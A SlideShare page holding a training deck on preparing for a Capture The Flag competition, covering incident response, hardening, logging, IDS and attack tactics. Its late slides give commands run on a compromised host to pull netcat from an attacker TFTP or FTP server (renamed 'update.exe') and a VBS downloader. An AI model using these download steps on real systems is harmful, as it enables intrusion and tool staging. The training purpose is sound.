SlideShare a Scribd company logo

Getting ready for a Capture The Flag Hacking Competition

Download as PPTX, PDF
Joe McCray, profile picture
Joe McCray

The document provides a comprehensive guide on preparing for Capture The Flag (CTF) competitions, focusing on strategic security practices. It covers aspects such as incident response, system hardening, logging, intrusion detection systems, and strategies for effective team collaboration during competitions. Additionally, it outlines methodologies for both offensive and defensive tactics in CTF contexts to enhance participants' technical skills and preparedness.

Technology
Related topics:
Intrusion Detection
1 of 55
Downloaded 19 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
Strategic Security, Inc. © http://www.strategicsec.com/ Preparing For The Strategic Security CTF Presented By: Joe McCray joe@strategicsec.com http://www.linkedin.com/in/joemccray http://twitter.com/j0emccray
Strategic Security, Inc. © http://www.strategicsec.com/ Generic CTF Prep CTF Overview • What Is A CTF? • Generic CTF Prep • Strategic Security Specific CTF Prep • Incident Response • System Hardening • System Logging • Intrusion Detection System • Attacking Systems • Maintaining Access
Strategic Security, Inc. © http://www.strategicsec.com/ What is A CTF?
Strategic Security, Inc. © http://www.strategicsec.com/ What Is A CTF? According to Wikipedia: http://en.wikipedia.org/wiki/Capture_the_flag In computer security, Capture the Flag (CTF) is a computer security competition. CTF contests are usually designed to serve as an educational exercise to give participants experience in securing a machine, as well as conducting and reacting to the sort of attacks found in the real world. Reverse-engineering, network sniffing, protocol analysis, system administration, programming, and cryptanalysis are all skills which have been required by prior CTF contests at DEF CON. There are two main styles of capture the flag competitions: attack/defense and jeopardy.
Strategic Security, Inc. © http://www.strategicsec.com/ What Is A CTF?…(cont.) According to Wikipedia: http://en.wikipedia.org/wiki/Capture_the_flag Jeopardy style competitions usually involve multiple categories of problems, each of which contains a variety of questions of different point values. Teams race to be the first to solve the most number of points, but do not directly attack each other.
Strategic Security, Inc. © http://www.strategicsec.com/ What Is A CTF?…(cont.) According to Wikipedia: http://en.wikipedia.org/wiki/Capture_the_flag In an attack/defense style competition, each team is given a machine (or a small network) to defend on an isolated network. Teams are scored on both their success in defending their assigned machine and on their success in attacking other team's machines. Image from: http://ctf.itsec.rwth-aachen.de/vpn/
Strategic Security, Inc. © http://www.strategicsec.com/ What Is A CTF?…(cont.) According to Wikipedia: http://en.wikipedia.org/wiki/Capture_the_flag Depending on the nature of the particular CTF game, teams may either be attempting to take an opponent's flag from their machine or teams may be attempting to plant their own flag on their opponent's machine. Image from: http://ctf.itsec.rwth-aachen.de/vpn/
Strategic Security, Inc. © http://www.strategicsec.com/ Generic CTF Prep
Strategic Security, Inc. © http://www.strategicsec.com/ Generic CTF Prep Jeopardy Style CTF Prep Similar to preparing for the TV Show Jeopardy: http://ken-jennings.com/faq • Really hard to cram for so hit the common trivia stuff • Hacker history • High profile attacks/vulnerabilities • Hacker movies • Skip the protocol/programming stuff – either you know it or you don’t Network Attack/Defense Prep • Download all patches for common OSs, or build your own repos • Organize your incident response tools • Have trusted binaries for most common Oss • Organize your exploitation/post-exploitation tools/scripts
Strategic Security, Inc. © http://www.strategicsec.com/ Strategic Security CTF Prep
Strategic Security, Inc. © http://www.strategicsec.com/ Strategic Security CTF Prep Step 1: Start with the basics • Verify that the place you will be playing from has fast/stable internet • Verify that the network that you will be playing from is secure/safe • Create a separate subnet for yourself (cheap router) • Turn off or firewall all of the other computers in your subnet • Make sure no one else is using your subnet during the game • Verify that the attack workstation/Virtual Machine you will be using has at least 2GB of RAM • Verify that the defensive server has at least 4GB of RAM • Download/Install the latest version of VMWare Workstation or Player
Strategic Security, Inc. © http://www.strategicsec.com/ Strategic Security CTF Prep Step 2: Get Your Team Organized • Set up a means for your team to interactively communicate in real time • Google Hangout, Skype, IRC, etc • Set up a means for your team to share resources (docs, tools, etc) • Google Hangout, Google Docs, Sharepoint, Wiki • Understand that some teammates may be in different timezones • Break your team up by function(s) • Attackers • Defenders • Systems Administrators • Researchers
Strategic Security, Inc. © http://www.strategicsec.com/ Strategic Security CTF Prep Step 2: Get Your Team Organized (Cont.) • Players that do not have a team will be placed on teams by Thursday 5 Dec. • Get your new teammates integrated quickly • Job role(s) • Access to team resources • Get everyone’s tools, scripts together and try to get them documented so team members can know how to use them and more importantly what they look like to your defensive mechanisms
Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response
Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response Step 3: Prepare For Incident Response • The first critical skill required of this game will be incident response • Your system will be backdoored • Your system will be rootkited • Your system will be loaded with vulnerabilities • Everything from weak passwords, to custom buffer overflows Required Incident Response Skills • Your team will have to be able to quickly find and remove backdoors • Your team will have to be able to quickly find and remove rootkits
Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response The Methodology (Step 1: List all running processes) • GUI Tools • Task Manager • Process Explorer: • http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx • Command-line Tools • Tasklist Command: • http://technet.microsoft.com/en-us/library/bb491010.aspx • PsList: • http://technet.microsoft.com/en-us/sysinternals/bb896682.aspx
Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response The Methodology (Step 2: Identify malicious processes) • Look up every process that is running to see if it is legitimate • Resources: • http://www.fileresearchcenter.com/ • http://www.neuber.com/taskmanager/process/index.html • http://www.liutilities.com/products/wintaskspro/processlibrary/ • Of course Google!
Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response The Methodology (Step 3: Kill all malicious processes) • GUI Tools • Task Manager • Process Explorer: • http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx • Command-line Tools • Taskkill Command: • http://technet.microsoft.com/en-us/library/bb491009.aspx • PsKill • http://technet.microsoft.com/en-us/sysinternals/bb896683.aspx
Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response The Methodology (Step 4: Find All Malicious Connections) • TCPView (GUI Tool): • http://technet.microsoft.com/en-us/sysinternals/bb897437.aspx • Netstat Command: • http://windowsitpro.com/windows/using-netstat-get-list-open-ports • https://isc.sans.edu/forums/diary/Fun+With+Windows+Netstat/1911 • http://computer-networking.wonderhowto.com/how-to/detect-hackers-with-netstat-262222/ • http://www.dti.ulaval.ca/webdav/site/sit/shared/Librairie/di/operations/informatique/windows/netstat_results.htm • During the game – take note of your teammates’ IP addresses • If there is an IP that doesn’t belong to your teammates connected to your server – that is probably an attacker from another team and you should kill that connection
Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response The Methodology (Step 5: Kill All Malicious Connections) • TCPView (GUI Tool): • http://technet.microsoft.com/en-us/sysinternals/bb897437.aspx • Taskkill Command • wKillcx • http://wkillcx.sourceforge.net/
Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response The Methodology (Step 6: Find Malicious Services) • References: • http://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a- service/ • http://www.addictivetips.com/windows-tips/smartly-analyze-windows- local-services-for-malware-rootkits-more/ • http://reverseengineering.stackexchange.com/questions/2019/debuggin g-malware-that-will-only-run-as-a-service
Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response The Methodology (Step 7: Find Rootkits) • References: • http://www.computerweekly.com/feature/Rootkit-and-malware- detection-and-removal-guide
Strategic Security, Inc. © http://www.strategicsec.com/ Incident Response Resources Good Technical Incident Response Resources • References: • http://www.slideshare.net/pmelson/malware-analysis-made-simple-presentation • http://computer-forensics.sans.org/summit-archives/DFIR_Summit/Finding-Malware-Like-Iron-Man-Corey-Harrell.pdf
Strategic Security, Inc. © http://www.strategicsec.com/ What Are We Covering Today Today We Will Be Covering • What Is A CTF? • Generic CTF Prep • Strategic Security Specific CTF Prep • Incident Response • System Hardening • System Logging • Intrusion Detection Systems • Attacking Systems • Maintaining Access
Strategic Security, Inc. © http://www.strategicsec.com/ System Hardening
Strategic Security, Inc. © http://www.strategicsec.com/ System Hardening The Methodology (Step 1: Create Hardening Checklists) • STIG • http://iase.disa.mil/stigs/ • Hardening Guides • http://www.nsa.gov/ia/mitigation_guidance/security_configuration_guides/operating_systems.shtml • https://secure.ericade.net/security/index.php/Windows_Hardening_Guide • https://benchmarks.cisecurity.org/downloads/benchmarks/ • Generic Hardening Resources • http://www.xmarks.com/topic/server_hardening
Strategic Security, Inc. © http://www.strategicsec.com/ System Hardening The Methodology (Step 2: Organize Your Tools and Scripts) • MBSA • http://www.microsoft.com/en-us/download/details.aspx?id=7558 • Benchmark Assessment Tools • http://benchmarks.cisecurity.org/downloads/audit-tools/
Strategic Security, Inc. © http://www.strategicsec.com/ System Hardening The Methodology (Step 3: Focus on Scripting) • Scripting For Security • http://www.sans.org/reading-room/whitepapers/scripting • http://blog.commandlinekungfu.com/p/index-of-tips-and-tricks.html • http://technet.microsoft.com/en-us/scriptcenter/dd742377.aspx • http://www.sans.org/reading-room/whitepapers/auditing/simple-windows-batch-scripting-intrusion-discovery-33193 • Interesting Book I Came Across Today • http://www.amazon.com/Perl-Scripting-Windows-Security-Monitoring/dp/159749173X • Haven’t read it • Don’t know the author • But looks interesting and may help with this game
Strategic Security, Inc. © http://www.strategicsec.com/ System Hardening The Methodology (Step 4: Focus on Continuous Monitoring) • Be conscious of the potential skill of the attackers • Consider yourself breached at all times during the game IMPORTANT • Throughout the game be sure to constantly verify that your security configurations have not changed
Strategic Security, Inc. © http://www.strategicsec.com/ System Hardening The Methodology (Step 1: Create Hardening Checklists) • Stigs • http://iase.disa.mil/stigs/ • Hardening Guides • http://www.nsa.gov/ia/mitigation_guidance/security_configuration_guides/operating_systems.shtml • https://secure.ericade.net/security/index.php/Windows_Hardening_Guide • https://benchmarks.cisecurity.org/downloads/benchmarks/ • Generic Hardening Resources • http://www.xmarks.com/topic/server_hardening • Blah
Strategic Security, Inc. © http://www.strategicsec.com/ System Logging
Strategic Security, Inc. © http://www.strategicsec.com/ System Logging The Methodology (Step 1: Understand Windows Logging) • Windows Logging Basics • http://www.windowsecurity.com/articles- tutorials/windows_os_security/Understanding_Windows_Logging.html • http://www.sans.org/security-resources/idfaq/logging-windows.php • http://en.wikipedia.org/wiki/Event_Viewer • Event ID Listings • http://www.eventid.net/ • http://www.ultimatewindowssecurity.com/securitylog/encyclopedia/Default.aspx
Strategic Security, Inc. © http://www.strategicsec.com/ System Logging The Methodology (Step 2: Organize Log Analysis Tools) • Free Tools • http://www.microsoft.com/en-us/download/details.aspx?id=24659 • http://www.lizard-labs.net/log_parser_lizard.aspx • http://visuallogparser.codeplex.com/ • Learn To Use Log Parser and Log Parser Lizard • http://computer-forensics.sans.org/blog/2011/02/10/computer-forensics-howto-microsoft-log-parser • Take it to the next level with Splunk • https://www.sans.org/reading-room/whitepapers/logging/setting-splunk- event-correlation-home-lab-34422
Strategic Security, Inc. © http://www.strategicsec.com/ System Logging The Methodology (Step 3: Organize Important Queries) • Good queries to run: • http://aggressivevirusdefense.wordpress.com/2010/04/23/log-parser/ • http://www.codinghorror.com/blog/2005/08/microsoft-logparser.html
Strategic Security, Inc. © http://www.strategicsec.com/ System Logging The Methodology (Step 4: Set Up Automated Tasks) • Windows Automation Basics • http://www.techradar.com/us/news/software/applications/how-to- automate-tasks-in-windows-1107254 • http://www.iopus.com/guides/winscheduler.htm • http://stackoverflow.com/questions/6933698/automate-services-restart- in-windows-server-2003
Strategic Security, Inc. © http://www.strategicsec.com/ Intrusion Detection Systems
Strategic Security, Inc. © http://www.strategicsec.com/ Intrusion Detection Systems The Methodology (Step 1: Start With The Basics) • Do you have the resources to run an IDS? • VMWare Workstation or ESXi (recommended) • At least 2GB of RAM to allocate to the IDS • Run on the same host machine as your team server (eases network configuration issues) • Are you willing to build it/debug it now? • Probably want a full day or 2 to just to play around with it if this is your first time • Run attacks with metasploit and get a feel of what alerts look like and how fast they come in
Strategic Security, Inc. © http://www.strategicsec.com/ Intrusion Detection Systems The Methodology (Step 2: Decide What To Deploy) • Lots of IDSs to choose from • Network Based • Snort http://snort.org/ • Suricata http://www.openinfosecfoundation.org/index.php/download-suricata • Bro http://www.bro.org/ • Host-Based • OSSEC http://www.ossec.net/
Strategic Security, Inc. © http://www.strategicsec.com/ Intrusion Detection Systems The Methodology (Step 2: Decide What To Deploy - Cont) • Network based IDS are good, but are highly prone to false positives • Host-Based IDS are great, but require something running on the host • The best option is to combine the two IDS types, but that can be a lot of work • The problem with deploying both of them is that it can be a lot of work
Strategic Security, Inc. © http://www.strategicsec.com/ Intrusion Detection Systems The Methodology (Step 3: Deploy with bang for buck in mind) • Use something that gives you the most bang for your buck (tools/features) • Use something that you can build quickly • My Recommendations: • Security Onion: http://blog.securityonion.net/p/securityonion.html • OSSIM: http://www.alienvault.com/open-threat-exchange/projects
Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems
Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 1: Attack Yourself First) • Don’t tip your hat to other teams by researching on their servers • Create a copy (clone) of your team server • This will allow attackers to develop working attacks for the server • Run all security tools (Nessus/Metasploit) against your clone server • http://www.slideshare.net/dc612/dc612-hands-on-penetration-testing-101-presentation-final • http://www.slideshare.net/kozmaa/the-best-defense-is-a-good-offense-april-2013 • Create a list of attacks that work against your server
Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 2: Create Click Scripts) • Organize your attacks into click scripts • Shell Scripts • Batch Scripts • MSF CLI Scripts • Have a war chest of mad kung fu
Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 2: Create Click Scripts…cont.) • Start with shell scripts • Tutorials: • http://www.danscourses.com/Network-Penetration-Testing/bash-line-commands-a-shell-scripting.html • http://www.gnucitizen.org/blog/you-dont-need-the-ultimate-pen-testing-framework/ • http://www.commonexploits.com/lazymap-lazy-nmap-scanning-script/ • Videos: • http://www.youtube.com/watch?v=GPjcSxyIIUc
Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 2: Create Click Scripts…cont.) • Pentester Shell Script Resources • https://github.com/leebaird/discover • http://www.pentesterscripting.com/ • http://blog.commandlinekungfu.com/p/index-of-tips-and-tricks.html • https://www.sans.org/reading-room/whitepapers/auditing/admins-documentation-hackers-pentest-33303
Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 2: Create Click Scripts…cont.) • Pentester Windows Scripting Resources • http://www.sans.org/security-resources/sec560/windows_command_line_sheet_v1.pdf • http://synjunkie.blogspot.com/2008/03/basic-dos-foo.html • https://chapters.theiia.org/lansing/Documents/Command%20Line%20Basics%20for%20IT%20Auditors.pdf • https://isc.sans.edu/diary/Windows+Command-Line+Kung+Fu+with+WMIC/1229 • http://www.sans.org/reading-room/whitepapers/scripting/windows-script-host-hack-windows-33583 • http://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 2: Create Click Scripts…cont.) • Step Up To MSFCLI • http://www.offensive-security.com/metasploit-unleashed/Msfcli • http://www.youtube.com/watch?v=Jt6ynMun8Tk
Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 3: Have a War Chest Close By) • I think I’ve got a script for that…. • https://www.sans.org/reading-room/whitepapers/auditing/admins-documentation-hackers-pentest-33303 • http://www.rmccurdy.com/scripts/fu.txt
Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 4: Have lots of ways to download files) • There is no more critical offensive skill • Native • TFTP • FTP • VBS Script • In-line file transfer (debug.exe) • Bitsadmin • Powershell • Tools • Netcat Clones • Meterpreter Upload
Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 4: Have lots of ways to download files…cont.) • TFTP • Make sure your attacker machine is running a TFTP Server • On compromised host command prompt type: • tftp -i TFTP-Server-IP GET nc.exe c:nc.exe
Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 4: Have lots of ways to download files…cont.) • FTP • Make sure your attacker machine is running an FTP Server • Remember a hacked command prompt can not run interactive commands. • You will need to run an ftp script to pull this off: • On compromised host command prompt type: • echo user strategicsec strategicsec > c:ftp.txt • echo bin >> c:ftp.txt • echo get nc.exe update.exe >> c:ftp.txt • echo quit >> c:ftp.txt • ftp -n -s:c:ftp.txt FTP-Server-IP • del c:ftp.txt
Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 4: Have lots of ways to download files…cont.) • VBS Script • Make sure your attacker machine is running a web Server • http://www.wsec.be/blog/2009/07/20/pure-vbs-downloader-with-proxy-support • On compromised host command prompt echo in every line of the vbs file: • echo strUrl = WScript.Arguments.Item(0) >> vbs_download.vbs • echo StrFile = WScript.Arguments.Item(1) >> vbs_download.vbs • . • . • echo Next >> vbs_download.vbs • echo ts.Close >> vbs_download.vbs • cscript vbs_download.vbs http://WebServer-IP/file.txt file.txt
Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 4: Have lots of ways to download files…cont.) • In-Line File Transfer (debug.exe method) • Make sure your attacker machine is running a web Server • http://ow.ly/rE9UH • http://rhysmossom.com/2013/07/01/mssql-fileupload-autohack/ • http://www.blackhat.com/presentations/bh-dc-10/Bannedit/BlackHat-DC-2010-Bannedit-Advanced-Command-Injection-Exploitation-1-wp.pdf • On compromised host command paste in hex opcode.
Strategic Security, Inc. © http://www.strategicsec.com/ Attacking Systems The Methodology (Step 4: Have lots of ways to download files…cont.) • Win7 and higher tricks (other stuff may be disabled) • http://www.greyhathacker.net/?tag=download-and-execute • The link covers the following methods • Vbs • wsh • Bitsadmin • Powershell
Strategic Security, Inc. © http://www.strategicsec.com/ Contact Me.... Toll Free: 1-844-458-1008 Email: joe@strategicsec.com Twitter: http://twitter.com/j0emccray LinkedIn: http://www.linkedin.com/in/joemccray

More Related Content

PPTX
So you wanna be a pentester - free webinar to show you how
Joe McCray
 
PPTX
Big Bang Theory: The Evolution of Pentesting High Security Environments
Joe McCray
 
PDF
Building a low cost hack lab
Joe McCray
 
PPTX
You Spent All That Money And Still Got Owned
Joe McCray
 
PPTX
Wireless Pentesting: It's more than cracking WEP
Joe McCray
 
PPTX
Advanced SQL Injection
Joe McCray
 
PDF
Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...
Security Weekly
 
PDF
The Internet of Insecure Things: 10 Most Wanted List
Security Weekly
 
So you wanna be a pentester - free webinar to show you how
Joe McCray
 
Big Bang Theory: The Evolution of Pentesting High Security Environments
Joe McCray
 
Building a low cost hack lab
Joe McCray
 
You Spent All That Money And Still Got Owned
Joe McCray
 
Wireless Pentesting: It's more than cracking WEP
Joe McCray
 
Advanced SQL Injection
Joe McCray
 
Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...
Security Weekly
 
The Internet of Insecure Things: 10 Most Wanted List
Security Weekly
 

What's hot (19)

PDF
Big Bang Theory: The Evolution of Pentesting High Security Environments
Chris Gates
 
PDF
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014
Security Weekly
 
PDF
Secure Coding for Java - An Introduction
Sebastien Gioria
 
PPT
Give Me Three Things: Anti-Virus Bypass Made Easy
Security Weekly
 
PPTX
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat Security Conference
 
PPTX
Pwn phone2014 jrs
Security Weekly
 
PPTX
BlueHat v17 || You Are Making Application Whitelisting Difficult
BlueHat Security Conference
 
PPT
Survey Presentation About Application Security
Nicholas Davis
 
PPTX
BlueHat v17 || Raising the Bar: New Hardware Primitives for Exploit Mitigations
BlueHat Security Conference
 
PPTX
Bug Bounty #Defconlucknow2016
Shubham Gupta
 
PDF
Web Application Frewall
Abhishek Singh
 
PDF
How to Destroy a Database
John Ashmead
 
PPTX
OWASP
Pen Testeronyguy
 
PPTX
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Cyber Security Alliance
 
PPTX
A bug's life - Decoupled Drupal Security and Vulnerability Management
Balázs Tatár
 
PDF
Owasp advanced mobile-application-code-review-techniques-v0.2
drewz lin
 
PDF
Content Security Policy - Lessons learned at Yahoo
Binu Ramakrishnan
 
PDF
Перевірка роботи McAfee ENS. MVISION Insights SUNBURST.
Vladyslav Radetsky
 
PDF
Security Theatre - Confoo
xsist10
 
Big Bang Theory: The Evolution of Pentesting High Security Environments
Chris Gates
 
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014
Security Weekly
 
Secure Coding for Java - An Introduction
Sebastien Gioria
 
Give Me Three Things: Anti-Virus Bypass Made Easy
Security Weekly
 
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat Security Conference
 
Pwn phone2014 jrs
Security Weekly
 
BlueHat v17 || You Are Making Application Whitelisting Difficult
BlueHat Security Conference
 
Survey Presentation About Application Security
Nicholas Davis
 
BlueHat v17 || Raising the Bar: New Hardware Primitives for Exploit Mitigations
BlueHat Security Conference
 
Bug Bounty #Defconlucknow2016
Shubham Gupta
 
Web Application Frewall
Abhishek Singh
 
How to Destroy a Database
John Ashmead
 
OWASP
Pen Testeronyguy
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Cyber Security Alliance
 
A bug's life - Decoupled Drupal Security and Vulnerability Management
Balázs Tatár
 
Owasp advanced mobile-application-code-review-techniques-v0.2
drewz lin
 
Content Security Policy - Lessons learned at Yahoo
Binu Ramakrishnan
 
Перевірка роботи McAfee ENS. MVISION Insights SUNBURST.
Vladyslav Radetsky
 
Security Theatre - Confoo
xsist10
 

Similar to Getting ready for a Capture The Flag Hacking Competition (20)

PPTX
How I Learnt hacking in High School - BSidesLV - 2015
lokeshpidawekar
 
PDF
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Mauricio Velazco
 
PDF
Breach and attack simulation tools
Bangladesh Network Operators Group
 
PDF
Vulnerability Management: A Comprehensive Overview
Steven Carlson
 
PDF
The Golden Rules - Detecting more with RSA Security Analytics
Demetrio Milea
 
PDF
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
fangjiafu
 
PPTX
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
lokeshpidawekar
 
PDF
Building your macOS Baseline Requirements MacadUK 2018
Henry Stamerjohann
 
PDF
Sophisticated Attacks - Can We Really Detect Them _v1.2.pdf
Michael Gough
 
PDF
Introduction to red team operations
Sunny Neo
 
PDF
2023 NCIT: Introduction to Intrusion Detection
APNIC
 
PPTX
Defending Enterprise IT - beating assymetricality
Claus Cramon Houmann
 
PDF
Hardware Security on Vehicles
Priyanka Aash
 
PDF
TRITON: How it Disrupted Safety Systems and Changed the Threat Landscape of I...
Priyanka Aash
 
PDF
Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)
ITCamp
 
PDF
Super Easy Memory Forensics
IIJ
 
PPTX
How to Normalize Threat Intelligence Data from Multiple Sources - Tech Talk T...
AlienVault
 
PPTX
Keynote Information Security days Luxembourg 2015
Claus Cramon Houmann
 
PDF
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Jennifer Burns
 
PPTX
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
Qualcomm Developer Network
 
How I Learnt hacking in High School - BSidesLV - 2015
lokeshpidawekar
 
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Mauricio Velazco
 
Breach and attack simulation tools
Bangladesh Network Operators Group
 
Vulnerability Management: A Comprehensive Overview
Steven Carlson
 
The Golden Rules - Detecting more with RSA Security Analytics
Demetrio Milea
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
fangjiafu
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
lokeshpidawekar
 
Building your macOS Baseline Requirements MacadUK 2018
Henry Stamerjohann
 
Sophisticated Attacks - Can We Really Detect Them _v1.2.pdf
Michael Gough
 
Introduction to red team operations
Sunny Neo
 
2023 NCIT: Introduction to Intrusion Detection
APNIC
 
Defending Enterprise IT - beating assymetricality
Claus Cramon Houmann
 
Hardware Security on Vehicles
Priyanka Aash
 
TRITON: How it Disrupted Safety Systems and Changed the Threat Landscape of I...
Priyanka Aash
 
Security Myths and Facts in Today's It World (Tudor Damian & Mihai Tataran)
ITCamp
 
Super Easy Memory Forensics
IIJ
 
How to Normalize Threat Intelligence Data from Multiple Sources - Tech Talk T...
AlienVault
 
Keynote Information Security days Luxembourg 2015
Claus Cramon Houmann
 
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Jennifer Burns
 
Developing for Industrial IoT with Linux OS on DragonBoard™ 410c: Session 4
Qualcomm Developer Network
 

Recently uploaded (20)

PPTX
1. Introduction to Computer Programming.pptx
bonakiduza1024
 
PDF
WOOl fibre morphology and structure.pdf for textiles
Rajendrakumar868651
 
PPTX
cloud_computing_Infrastucture_as_cloud_p
mainakbhattacharya20
 
PPTX
Group 1 Presentation -Planning and Decision Making .pptx
MatthewLewis227954
 
PDF
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
PPTX
A Presentation on Touch Screen Technology
memembruh336
 
PDF
A novel scalable deep ensemble learning framework for big data classification...
IAESIJAI
 
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
PDF
Accuracy of neural networks in brain wave diagnosis of schizophrenia
IAESIJAI
 
PDF
Zenith AI: Advanced Artificial Intelligence
Biz Preneurs
 
PDF
Mushroom cultivation and it's methods.pdf
mailmeonrishi
 
PDF
Hindi spoken digit analysis for native and non-native speakers
IAESIJAI
 
PPTX
Chapter 5: Probability Theory and Statistics
RandyFin
 
PDF
Heart disease approach using modified random forest and particle swarm optimi...
IAESIJAI
 
PDF
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
PDF
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
PPTX
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
PDF
Univ-Connecticut-ChatGPT-Presentaion.pdf
ry7r52mzb4
 
PPTX
OMC Textile Division Presentation 2021.pptx
JahangirAlam816069
 
PPTX
TLE Review Electricity (Electricity).pptx
JayPolicarpio2
 
1. Introduction to Computer Programming.pptx
bonakiduza1024
 
WOOl fibre morphology and structure.pdf for textiles
Rajendrakumar868651
 
